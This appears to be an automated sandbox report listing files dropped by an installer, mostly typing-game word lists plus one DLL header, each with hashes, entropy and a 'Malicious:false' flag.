                                                          Size (bytes):806
                                                          Entropy (8bit):4.0959883491003355
                                                          Encrypted:false
                                                          SSDEEP:24:K+M3LaZBzeze7CdgiwObaBKWNht3t9x8Vfx:KhEJeze7auOba3jOfx
                                                          MD5:CEFE2FBB3B99BDDA4ABEA03C407685AA
                                                          SHA1:20EB7DBB809F27BF3C477F546250D642D3320C8C
                                                          SHA-256:C3A4438B54217981191000FC79E36FAC02D9AB99A0E0B151D0892BD163A0FE8F
                                                          SHA-512:9BF4873A5D4C83E51905D080FCC7426203D59C34ACEDD3B21C0D45542135BA7313FC667470473CF0B5CE3C1B9E9BC46B513E8092DC138CF0529FB01DE5C94A97
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Mots de 5 lettres (L.Z).LAINE.LAMES.LAPIN.LARGE.LEGER.LEVER.LIONS.LIVRE.LIVRE.LOUPS.LUTIN.MAGIE.MAIRE.MAJOR.MANGE.MANGE.MANGE.MATIN.METAL.MICRO.MIEUX.MIMER.MODES.MOINS.MOLLE.NAGER.NEIGE.NINJA.NOYAU.NUAGE.NUITS.OBJET.ODEUR.OGRES.OMBRE.ORAGE.ORDRE.OUTIL.PAIRE.PANDA.PANNE.PARTI.PASSE.PATTE.PAYER.PEINE.PEPIN.PERLE.PERLE.PETIT.PIANO.PIONS.PLATE.PLEIN.PLEUR.PORTS.POSER.POSER.POULE.PROIE.PUNIR.QUAND.RADIS.RADJA.RATER.RAYON.REINE.REJET.RENNE.RESTE.REVER.RICHE.ROBOT.RUBAN.RUBIS.RUINE.SABOT.SALIR.SAPIN.SELLE.SENTI.SEULE.SIGNE.SINGE.SIROP.SORTE.SOUCI.SPORT.SUCER.SUITE.SUJET.TABAC.TACHE.TANTE.TARTE.TENIR.TERRE.TISSU.TISSU.TITRE.TOMBE.TORDU.TOURS.TRAIN.TRAIT.TRIER.TRONC.TUBES.TUILE.USINE.UTILE.VACHE.VAGUE.VENDU.VENTS.VERRE.VERRE.VERRE.VERSE.VERTE.VIDES.VIGNE.VILLE.VILLE.VIVRE.VOILE.VOILE.VRAIE.WAGON.ZEBRE.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\tsharkdecode.dll (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):69632
                                                          Entropy (8bit):5.9471839268980276
                                                          Encrypted:false
                                                          SSDEEP:1536:1qkfBMFLAlVQtlJR5E7kGJasMaooupW51+SXKl6U22Ol2B:RZ4LRa7ksasM3f4C6d2Ol2B
                                                          MD5:8E8285AAC0EF77A6CEDE53EAFE9C5298
                                                          SHA1:8A4715C1C8591B83B925282AF5BA72832C1CA0FC
                                                          SHA-256:3A94A8E5F9AB0ECA82611F95DC78C07C5093574C772B9C19D590F8E959191973
                                                          SHA-512:04F24CFA4F187FBE897033359EB3A2DA19C4225B514E0D6EE269D741C8BF86D9F7A5860AE2DE676DF1748C0D64CCB9DD58758CBE1524FF938C99224AFD30997F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z^su>?.&>?.&>?.&.q.&??.&QI.&??.&QI.&5?.&QI.&:?.&QI.&8?.&7G.&=?.&>?.&v?.&%..&:?.&%..&??.&%..&??.&Rich>?.&........PE..d....M.U.........." .........N...............................................P............@.........................................@...........P....0....... ...............@..h...0................................................................................text............................... ..`.rdata...;.......<..................@..@.data... ...........................@....pdata....... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\words\alphabet.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):61
                                                          Entropy (8bit):3.793328115293812
                                                          Encrypted:false
                                                          SSDEEP:3:Aur+v5qTivtvsvvvgBy7UlWf2vxvwvzv8N+nn:AW+xCilsfOiOa2Bw7OKn
                                                          MD5:712B83A5039B83E8EA588C5FAD1103ED
                                                          SHA1:41EAA1481FDF1FBDAFD223628B59137A01ECCDC8
                                                          SHA-256:8CB96DAE0B17AC655C0DC6AE5D5C90C28FD393841A11074D59A6F10D0F22B8C7
                                                          SHA-512:D5AEC644F8CBE68F8689597D2BAA4660455E4005DF56269FC612182A946C2718B8B0B6872EFD5F72DC69DEF48F59CAD24112E7874101034A56344044F4F229BB
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Alphabet.A.B.C.D.E.F.G.H.I.J.K.L.M.N.O.P.Q.R.S.T.U.V.W.X.Y.Z.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\words\animals.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):893
                                                          Entropy (8bit):4.259394608447225
                                                          Encrypted:false
                                                          SSDEEP:24:KbP7ohYAegvAwqZASWvVagm62F5xclQL7bX5FL2:I6YAegv86a562f2lcnbL2
                                                          MD5:C9FF7015CBA0A58728C49B05FA99993A
                                                          SHA1:9B6B8341A6BBB3F8FC4608F74BB67914F7FA9606
                                                          SHA-256:13CB97C43586C2167E7487554E98850BEF9B3FBA26D7CE5CF208461B704A4D0E
                                                          SHA-512:8E80151BA293ACAB0E1C199058C3CC70B76758EB3FD8790BB5B5A0ADC5C75DD344CE5DCF535886493C37A1E216E15D0C286C4E551DB8EBB0B0E4DD5B9911D129
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Animals.ALLIGATOR.ANT.ANTELOPE.APE.BABOON.BADGER.BAT.BEAR.BEAVER.BEE.BISON.BUFFALO.BULL.BUTTERFLY.CAMEL.CAT.CATTLE.CHEETAH.CHICKEN.CHIPMUNK.COBRA.COCKROACH.CORMORANT.COW.COYOTE.CRAB.CRANE.CROCODILE.CROW.DEER.DOG.DOGFISH.DOLPHIN.DONKEY.DOVE.DUCK.EAGLE.ECHIDNA.EEL.ELAND.ELEPHANT.ELK.EMU.FALCON.FERRET.FINCH.FISH.FLAMINGO.FLY.FOX.FROG.GAZELLE.GERBIL.GIRAFFE.GNU.GOAT.GOOSE.GORILLA.GUANACO.GULL.HAMSTER.HARE.HAWK.HEDGEHOG.HERON.HIPPO.HOG.HOMET.HORSE.HUMAN.HYENA.JACKAL.JAGUAR.JELLYFISH.KANGAROO.KOALA.LADYBUG.LEOPARD.LION.LLAMA.LOBSTER.LYNX.MANATEE.MIDGE.MINK.MOLE.MONKEY.MOOSE.MOSQUITO.MOUSE.OSTRICH.OTTER.OWL.OX.OYSTER.PANDA.PARROT.PARTRIDGE.PEACOCK.PELICAN.PENGUIN.PIG.PIGEON.RABBIT.RACCOON.RAM.RAT.RAVEN.REINDEER.RHINO.ROOK.SEAGULL.SEAHORSE.SEASTAR.SEAL.SHARK.SHEEP.SNAIL.SNAKE.SPARROW.SPIDER.SQUIRREL.STAG.STARFISH.SWALLOW.SWAN.TIGER.TOAD.TURKEY.TURTLE.WALRUS.WASP.WHALE.WOLF.WORM.YAK.ZEBRA.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\words\astronomy.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):488
                                                          Entropy (8bit):4.186292973460784
                                                          Encrypted:false
                                                          SSDEEP:12:p2mUlUp1ok9BtTeHqhw6iq3q3jOpz5u3u+VQwv:+lEyruw6J4y3kVQ4
                                                          MD5:18406EFA6EF1A905F31541276638583D
                                                          SHA1:0738F28BEC885DE8C51F08F9CFDD5BA01A0097BD
                                                          SHA-256:7D1C0767DE14B8E1836293253433496568AA9D98EF54EA0147B71E011CB4311D
                                                          SHA-512:BBDD4087BBAC7CEBF9FA786CB71E6EBC69EF8375962A9541DF7C2FE908F6699FD70A0F92B4D0A40D42B330813B6910D4CDB02D6E5083E453D5177AFC0F151F10
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Astronomy.ALBEDO.ALPHA.ASTEROID.BETA.CLUSTER.COMET.COSMIC.COSMOS.COSMOGONY.COSMOLOGY.DELTA.DUST.DWARF.EARTH.ECLIPSE.ECLIPTIC.FLARE.GALACTIC.GALAXY.GAMMA.GIANT.GALILEAN.HALO.HELIOCENTRIC.INTERSTELLAR.ION.IONIC.IONOSPHERE.JUPITER.LATITUDE.LIMB.MAGNETIC.MAGNETOSPHERE.MARS.MERCURY.MERIDIAN.METEOR.MOON.NEBULA.NEUTRON.NEWTONIAN.NEPTUNE.NOVA.ORBIT.PHOTON.PHOTOSPHERE.PLANET.PLUTO.PULSAR.QUASAR.SATELLITE.SATURN.SIDEREAL.SOLAR.SPACE.STAR.SUN.SUNSPOT.SUPERNOVA.TERRESTRIAL.UNIVERSE.URANUS.VENUS.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\words\colors.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):144
                                                          Entropy (8bit):4.188809416596911
                                                          Encrypted:false
                                                          SSDEEP:3:IFergnedhsV+xnhvUgSMB3RrkB9G81wT9ryHJEg+vp6vPu+lv:genPzfv5JYNO9WHJEbx6vPPlv
                                                          MD5:70FEBE5A878CD95E91B69AFF631A7681
                                                          SHA1:8D86EB3DAB81588A3E7EC319B3C209C0A702EC9E
                                                          SHA-256:4A6B55D4E6D3CBCDC703FD6AEDDD432E914ABE730B30AD8E54A7C771AFE6F11F
                                                          SHA-512:C94425E9C1622E81C28E884FF9C0FC9733370BFF3427DC8B3888855AF5273FE898F94680E27AA821B04AF218E4921041E86AF24B8B7F9C635FED76E8E30A2207
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Colors.RED.PINK.BLUE.CYAN.LIME.GRAY.TEAL.GOLD.GREEN.BROWN.SILVER.MAROON.ORANGE.VIOLET.YELLOW.PURPLE.BRONZE.INDIGO.MAGENTA.LAVENDER.BLACK.WHITE..
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\words\fingers.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):131
                                                          Entropy (8bit):4.5244587363903594
                                                          Encrypted:false
                                                          SSDEEP:3:+7XGJYxanNd3uOwgr5UyRvtE58iUKrmN9Gj/DV9xav3Lv:+KDnNd3trWOE9UKrmv0rIv3Lv
                                                          MD5:CCC1AB4D4F6D68E026916B785700131B
                                                          SHA1:0E1151C2E660AE43E5D10F79C02B2BA818DF2C61
                                                          SHA-256:578A87637F227EE95C41FE11D084EF4E85CB8833A270A9864EE533E4BCBC25E0
                                                          SHA-512:5D31C7C91E1386680181042B1CCA74819E18118ACB10341103C4BEBD1E84FEB9B863BE1AF5D0EC8D45298076FBB6C9CB4DB6A7EEDE801CF9A6CCD51572A20BE4
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Finger Exercises.FTC.TFC.ASFD.SAFD.JKL.KIK.WSX.SXW.DEC.DCE.ECD.UIOP.POIU.HYN.NHY.NYH.GTB.BGT.VCXZ.ZXCV.FVR.RFV.FVR.SWX.WXS.JUJ.RFR.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\words\fruit.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):140
                                                          Entropy (8bit):4.180613213396753
                                                          Encrypted:false
                                                          SSDEEP:3:LvgqMi1yj0R2k3osqrvDxX5vq4sGx+3k5+pwDkkZ1vUp6ysH:Lvgo1yjkosq7ZM4eg+pw4kHvHf
                                                          MD5:06DE8967661F6D2BB8D9E2C0BC817D8B
                                                          SHA1:7F6A460872A05F4AB3215C8D36F266581CE1CEC5
                                                          SHA-256:78674120D9B926FE8169FA676FB61B4D7D65631439DA51E641BD8181DB6F8A35
                                                          SHA-512:901F209982D5EF9E805BD5C60158CF8ABA7FD22D10851CB1822F65F645871AA36FF2A383C2A52B769A45AF56EB921C111814A89122D2CE2EB73CDBFCCFB40769
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Fruit.APPLE.ORANGE.PEAR.LEMON.LIME.KUMQUAT.GRAPE.BANANA.MELON.SATSUMA.PEACH.GRAPEFRUIT.STRAWBERRY.BLUEBERRY.BLACKBERRY.RASPBERRY.KIWI.MANGO.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\words\geography.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):120
                                                          Entropy (8bit):4.218834559547659
                                                          Encrypted:false
                                                          SSDEEP:3:zLBFmKLBRWv+yVsKLreoysYjXgaUt8wwpu8xpklsosjyJUm:nKKLWvlr3mpUmF9pklBs+JUm
                                                          MD5:A4ABB7B3436DF111EE40AF6725B18113
                                                          SHA1:9283AD1362ACCCE89E48ABCEDD9628C208B23ABC
                                                          SHA-256:31EA6B1AED3AA363F1332F4265915CE5D5EE738D1D7573834B592B79D18C9838
                                                          SHA-512:A8EEC92A409356DB9FC654481C0FF296E741C5C8F165BB5690CC83AF027C1A5D14A9398EBE81D41637F6F39FB9B34AA8218794D36C1FAEA9D0AA76C93F79AEE3
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Oceans and Continents.NORTH AMERICA.SOUTH AMERICA.AFRICA.EUROPE.ASIA.AUSTRALIA.ANTARCTICA.ATLANTIC.PACIFIC.INDIAN.ARCTIC
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\words\is-2152V.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):882
                                                          Entropy (8bit):4.147698276575406
                                                          Encrypted:false
                                                          SSDEEP:24:qOUGKuqd7IUZbKg0UpZKUC5tB2eD0xGriqvjl7aDAksITd+Y:qjuw7IKKVUpS5tB2eDaGuqvVaDAHITdL
                                                          MD5:861CABFDC0A36F9665146B15DE26807C
                                                          SHA1:CC63FE7D78A3B6F3AEDEB43B061B954A0B4267F5
                                                          SHA-256:A3806CAAF1BA12893A9D85C8CF12D2E890145A13A34848FFD0107C2128C7D058
                                                          SHA-512:0985102FCAEA29ACD4754F15029222DFF44B60C189EC740C97464E625BE6788D2B461E1308429E14EB768CA0DEF807FD6A2AC85BBF29DCA2822AEF5E96E84223
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Short Words.MY.ON.AGE.AID.ALL.AND.ANT.ASK.ART.AWE.AXE.BAD.BAG.BAR.BEE.BEG.BET.BID.BIN.BIT.BOO.BOW.BOY.BRO.BUG.BUM.BUS.BUY.BYE.CAM.CAN.CAP.CAR.CAT.CAY.COP.COW.CRY.CUT.DOG.DIG.DIP.DRY.DYE.EAR.EAT.EEL.EEG.ELF.END.EON.ERA.EYE.FAD.FAN.FEW.FIG.FIN.FIT.FIX.FOR.FRY.FUN.FUR.HAD.HAM.HAT.HEN.HER.HIM.HOD.HOG.HOP.HUB.HUN.ILL.INN.LAP.LAY.LEG.MAD.MAN.MAP.MAT.MOM.MOP.MUD.MUG.NAP.NOD.NOW.NUN.NUT.OAK.ODD.OFF.OIL.ONE.OUR.OWL.OWN.PAY.PIG.PAW.PEN.PET.POP.RAT.RAW.RAY.RED.RID.RIM.RIP.ROD.RUN.SAD.SAW.SAY.SEE.SKY.SLY.TAP.TEA.THE.TIN.TIP.TOO.TOP.TOY.TRY.TWO.TYE.VET.WAR.WET.WHO.WHY.WIN.WON.YES.ZIP.ZOO.ABLE.ACHE.ACID.BAIT.BAKE.BAND.BATH.BULL.CAMP.CAPE.CARE.COIN.COST.DARE.DART.DEBT.DOLL.DOOM.DOOR.EASY.EPIC.ETCH.EVIL.EXIT.FACT.FADE.FEED.FILL.FISH.FOIL.FOND.FREE.FUSS.GLAD.GULP.HELP.KEEP.KIND.LAND.LEAD.LINE.MEAN.MIND.MOVE.NEWS.PINE.PLOT.QUIT.SAND.SEEM.SELL.SEND.SIGN.SOON.STAR.TALL.TIME.VIEW.YELL.ZOOM.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\words\is-2TJIF.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):1799
                                                          Entropy (8bit):4.2349912514036845
                                                          Encrypted:false
                                                          SSDEEP:48:/wI/M3lxB6KAk7Ft58tROSaSmcpioeqfUAE/S:/NqBGkJt58tcdAbeqfUp/S
                                                          MD5:926FA7D82A70961D83C7B9DC051EE7B8
                                                          SHA1:D21672084C88F203F26D1F53E7DC952876CC1D35
                                                          SHA-256:FAFD9879344108A0A5196DF58B643F97AD1B07B2BDEEE54706FDF37022D79F09
                                                          SHA-512:8D97D5077CDA870605EA24639A68AA43E6CDBB1E70538A37D6C1ED68171FAC6E9E0F140B3C75D2AB66AA93CF1440C46E4331D6ADAB4D157EB0BD3CC547D3D4B9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Long Words.ACTOR.ADAPTER.ADVANCE.ADVENT.AGENCY.AGENDA.AHEAD.AIRSHIP.ALARM.ALLIES.ALPHABET.AMATEUR.AMAZED.ANARCHY.ANCHOR.ANGEL.ANTENNA.ANTIQUE.APPRIZE.ASTRAL.ATTITUDE.AUREUS.AVATAR.BALLOON.BATTERY.BECKON.BECOME.BEETLE.BEFORE.BEGINS.BEHALF.BEHAVE.BEHIND.BEHOLD.BEING.BELIEF.BELONG.BESIDE.BETTER.BEYOND.BLESS.BOREDOM.BOUGHT.BUDGET.CANVAS.CAPTAIN.CARCASS.CENTURY.CHAOS.CHAOTIC.CHEAT.CHEMIST.CHIMERA.CHURCH.CLASP.CLOCK.CLONING.COLONEL.COMMON.COMPANY.CONFIRM.COUNCIL.COURT.CREDIT.CROSSED.CURRANT.DECOY.DEDUCE.DEFENSE.DEGREE.DEMON.DESIRE.DESSERT.DEVELOP.DEVOUR.DIMMER.DINGER.DISBAND.DISCORD.DISMAY.DIVORCE.DONKEY.DRAGON.DREAMER.DROID.DROOL.EARLIER.EATING.ECOTYPE.ELEGANT.EMPIRE.ENZYME.EPILOGUE.ERROR.ETHICS.EXPORT.EXPRESS.EXTRACT.FAKIR.FAMILY.FEUDAL.FIANCEE.FLAME.FLOAT.FLOOR.FOOLISH.FOREARM.FOSSIL.FOUGHT.FRIGATE.FRILL.FUN.GABBLE.GALLON.GARAGE.GHOST.GLASS.GLIDING.GRAPHIC.GRAVE.GREAT.GREEN.GRUMBLE.HARMONY.HAUNTED.HIGHER.HIGHWIRE.HUMORIST.HUNGRY.HUNTED.HUNTER.IDEAL.IMMORTAL.IMPLORE.INCOME.INSULT.INVERT.IS
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\words\is-6MUN6.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):380
                                                          Entropy (8bit):4.233468493292691
                                                          Encrypted:false
                                                          SSDEEP:6:YoVGI0/lm6CgwGr4DJW2iXHfZyRmqF+8PsWp0nvpq81vr7oaLCABXUyv7+8vBuNG:d6Qlg/F2iXHiF+8PsuQBP1QQCARUyvh5
                                                          MD5:8C46EC2C88AA5A7BFD6692EE0C28108C
                                                          SHA1:86BB8766833577F9D4F5D5DCE7682ABDB3589FCA
                                                          SHA-256:302FCD53959886124C7581520DD47ECAFA33B68A1EA66FDCFB8894EC9EA2C63B
                                                          SHA-512:D0DB5F6F6D273BE73ECC144B0F91A8F5EF8DE8829118FA32CCECEEB5236E66D13A4A39DBE0003F040F0E953A8B2E9A9CF92562E747D7B0DDB0A0323462F2FF5F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Plants.ABELIA.ALOE.ACACIA.ASPARAGUS.AZALEA.BANANA.BASIL.BEAN.BEGONIA.BERRY.BLUEBERRY.CAMELLIA.CHERRY.COCOS.COFFEE.CORN.CRANESBILL.CROCUS.DAFFODIL.DAHLIA.DAISY.DIANTHUS.DOGWOOD.FICUS.FIG.FUCHSIA.GERANIUM.JASMINE.LILY.LAURUS.MALVA.MARIGOLD.ORCHID.OREGANO.PANSY.PARSLEY.PEAR.PEONY.PETUNIA.PINEAPPLE.POTATO.PUMPKIN.RHUBARB.RICE.ROSE.ROSEMARY.RUSHES.SQUASH.TOMATO.VERBENA.YUCCA.ZINNIA.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\words\is-D6LE6.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):893
                                                          Entropy (8bit):4.259394608447225
                                                          Encrypted:false
                                                          SSDEEP:24:KbP7ohYAegvAwqZASWvVagm62F5xclQL7bX5FL2:I6YAegv86a562f2lcnbL2
                                                          MD5:C9FF7015CBA0A58728C49B05FA99993A
                                                          SHA1:9B6B8341A6BBB3F8FC4608F74BB67914F7FA9606
                                                          SHA-256:13CB97C43586C2167E7487554E98850BEF9B3FBA26D7CE5CF208461B704A4D0E
                                                          SHA-512:8E80151BA293ACAB0E1C199058C3CC70B76758EB3FD8790BB5B5A0ADC5C75DD344CE5DCF535886493C37A1E216E15D0C286C4E551DB8EBB0B0E4DD5B9911D129
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Animals.ALLIGATOR.ANT.ANTELOPE.APE.BABOON.BADGER.BAT.BEAR.BEAVER.BEE.BISON.BUFFALO.BULL.BUTTERFLY.CAMEL.CAT.CATTLE.CHEETAH.CHICKEN.CHIPMUNK.COBRA.COCKROACH.CORMORANT.COW.COYOTE.CRAB.CRANE.CROCODILE.CROW.DEER.DOG.DOGFISH.DOLPHIN.DONKEY.DOVE.DUCK.EAGLE.ECHIDNA.EEL.ELAND.ELEPHANT.ELK.EMU.FALCON.FERRET.FINCH.FISH.FLAMINGO.FLY.FOX.FROG.GAZELLE.GERBIL.GIRAFFE.GNU.GOAT.GOOSE.GORILLA.GUANACO.GULL.HAMSTER.HARE.HAWK.HEDGEHOG.HERON.HIPPO.HOG.HOMET.HORSE.HUMAN.HYENA.JACKAL.JAGUAR.JELLYFISH.KANGAROO.KOALA.LADYBUG.LEOPARD.LION.LLAMA.LOBSTER.LYNX.MANATEE.MIDGE.MINK.MOLE.MONKEY.MOOSE.MOSQUITO.MOUSE.OSTRICH.OTTER.OWL.OX.OYSTER.PANDA.PARROT.PARTRIDGE.PEACOCK.PELICAN.PENGUIN.PIG.PIGEON.RABBIT.RACCOON.RAM.RAT.RAVEN.REINDEER.RHINO.ROOK.SEAGULL.SEAHORSE.SEASTAR.SEAL.SHARK.SHEEP.SNAIL.SNAKE.SPARROW.SPIDER.SQUIRREL.STAG.STARFISH.SWALLOW.SWAN.TIGER.TOAD.TURKEY.TURTLE.WALRUS.WASP.WHALE.WOLF.WORM.YAK.ZEBRA.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\words\is-D776U.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):61
                                                          Entropy (8bit):3.793328115293812
                                                          Encrypted:false
                                                          SSDEEP:3:Aur+v5qTivtvsvvvgBy7UlWf2vxvwvzv8N+nn:AW+xCilsfOiOa2Bw7OKn
                                                          MD5:712B83A5039B83E8EA588C5FAD1103ED
                                                          SHA1:41EAA1481FDF1FBDAFD223628B59137A01ECCDC8
                                                          SHA-256:8CB96DAE0B17AC655C0DC6AE5D5C90C28FD393841A11074D59A6F10D0F22B8C7
                                                          SHA-512:D5AEC644F8CBE68F8689597D2BAA4660455E4005DF56269FC612182A946C2718B8B0B6872EFD5F72DC69DEF48F59CAD24112E7874101034A56344044F4F229BB
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Alphabet.A.B.C.D.E.F.G.H.I.J.K.L.M.N.O.P.Q.R.S.T.U.V.W.X.Y.Z.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\words\is-D7K8O.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):131
                                                          Entropy (8bit):4.5244587363903594
                                                          Encrypted:false
                                                          SSDEEP:3:+7XGJYxanNd3uOwgr5UyRvtE58iUKrmN9Gj/DV9xav3Lv:+KDnNd3trWOE9UKrmv0rIv3Lv
                                                          MD5:CCC1AB4D4F6D68E026916B785700131B
                                                          SHA1:0E1151C2E660AE43E5D10F79C02B2BA818DF2C61
                                                          SHA-256:578A87637F227EE95C41FE11D084EF4E85CB8833A270A9864EE533E4BCBC25E0
                                                          SHA-512:5D31C7C91E1386680181042B1CCA74819E18118ACB10341103C4BEBD1E84FEB9B863BE1AF5D0EC8D45298076FBB6C9CB4DB6A7EEDE801CF9A6CCD51572A20BE4
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Finger Exercises.FTC.TFC.ASFD.SAFD.JKL.KIK.WSX.SXW.DEC.DCE.ECD.UIOP.POIU.HYN.NHY.NYH.GTB.BGT.VCXZ.ZXCV.FVR.RFV.FVR.SWX.WXS.JUJ.RFR.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\words\is-ECN20.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):1444
                                                          Entropy (8bit):4.247765748971925
                                                          Encrypted:false
                                                          SSDEEP:24:8g8muteQTW5d+ew52s0UjH/CpIdTrhhI+amefWxNc1xTiF9HKOkdsaHFrQDeqZRO:8g/FQTW574xjH/gIVV6mmuQToKeDtU
                                                          MD5:D34724B8D9935413FE501F71BFC63EED
                                                          SHA1:8BAD3BE97B83A2B5671C42C1912A5ACB57357102
                                                          SHA-256:A2ACA8E9D7E56D37DDBF127C863B40D11C9DB4A7A59347936C8448E2EC87CE13
                                                          SHA-512:C852F5547B6C944E28098EADE430D18C496A80C695D8A4ADF2BA22BE8D8C14F959335B585EFC9EE8A84DEB9F8293432BF52C71A3F98C6DE305A2984D66CDBBC1
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Medium Words.ACID.ADULT.AGENT.AHEAD.ALARM.ANGEL.ARMY.BADLY.BASE.BASES.BEAST.BEGIN.BITE.BLACK.BLANK.BLESS.BLUE.BREAK.BUDGET.BULL.BUOY.BURY.CAGE.CELLO.CHAOS.CHEAT.CLEAN.CLEAR.CLOCK.CLOSE.CLOWN.COBRA.CODER.COULD.COURT.CREEP.CREW.CROSS.DANDY.DAWN.DECAY.DECOY.DEMON.DINER.DISC.DISCO.DISK.DIVA.DIVE.DIVER.DONKEY.DREAD.DRIED.DRIER.DRINK.DUCK.DWELL.EAST.EQUAL.ERROR.ESSAY.EXAM.FACT.FAKE.FAKIR.FAMILY.FETCH.FIGHT.FLAME.FLAT.FLOAT.FLOOD.FLOOR.FLUTE.FOOD.FRUIT.FUN.GEESE.GENE.GHOST.GLORY.GLOVE.GLOW.GLUE.GNOME.GOAL.GOAT.GOLD.GOOSE.GRADE.GRASS.GRAVE.GRAY.GRAZE.GREEN.GREET.GRIND.GROW.HALF.HALL.HARD.HAWK.HAZY.HITCH.HOBBY.HONEY.HOOK.HORSE.HOTEL.HUMOR.ICON.IDEAL.IDLE.IDOL.INCOME.INVERT.IRON.IRONY.JACKET.JOKE.JULY.KEEN.KILT.LAWYER.LAZY.LEECH.LICK.LIFE.LIGHT.LIKE.LIVE.LOBBY.LUNCH.LURE.LYNX.MANLY.MAYBE.MEDAL.MERCY.MILK.MILKY.MINOR.MOAT.MODEL.MOOSE.MORE.MOUSE.MOVIE.NAME.NASTY.NOBLE.NORTH.NOVICE.ONLY.OPEN.PAPER.PEARL.PEEL.PEER.PHONE.PIKE.PINK.PLANK.PLANT.POLICE.POST.PUSS.QUELL.QUEST.QUIET.QUOTE.RASH.REACH.READY.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\words\is-F9M8J.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):488
                                                          Entropy (8bit):4.186292973460784
                                                          Encrypted:false
                                                          SSDEEP:12:p2mUlUp1ok9BtTeHqhw6iq3q3jOpz5u3u+VQwv:+lEyruw6J4y3kVQ4
                                                          MD5:18406EFA6EF1A905F31541276638583D
                                                          SHA1:0738F28BEC885DE8C51F08F9CFDD5BA01A0097BD
                                                          SHA-256:7D1C0767DE14B8E1836293253433496568AA9D98EF54EA0147B71E011CB4311D
                                                          SHA-512:BBDD4087BBAC7CEBF9FA786CB71E6EBC69EF8375962A9541DF7C2FE908F6699FD70A0F92B4D0A40D42B330813B6910D4CDB02D6E5083E453D5177AFC0F151F10
                                                          Malicious:false
                                                          Reputation:unknown
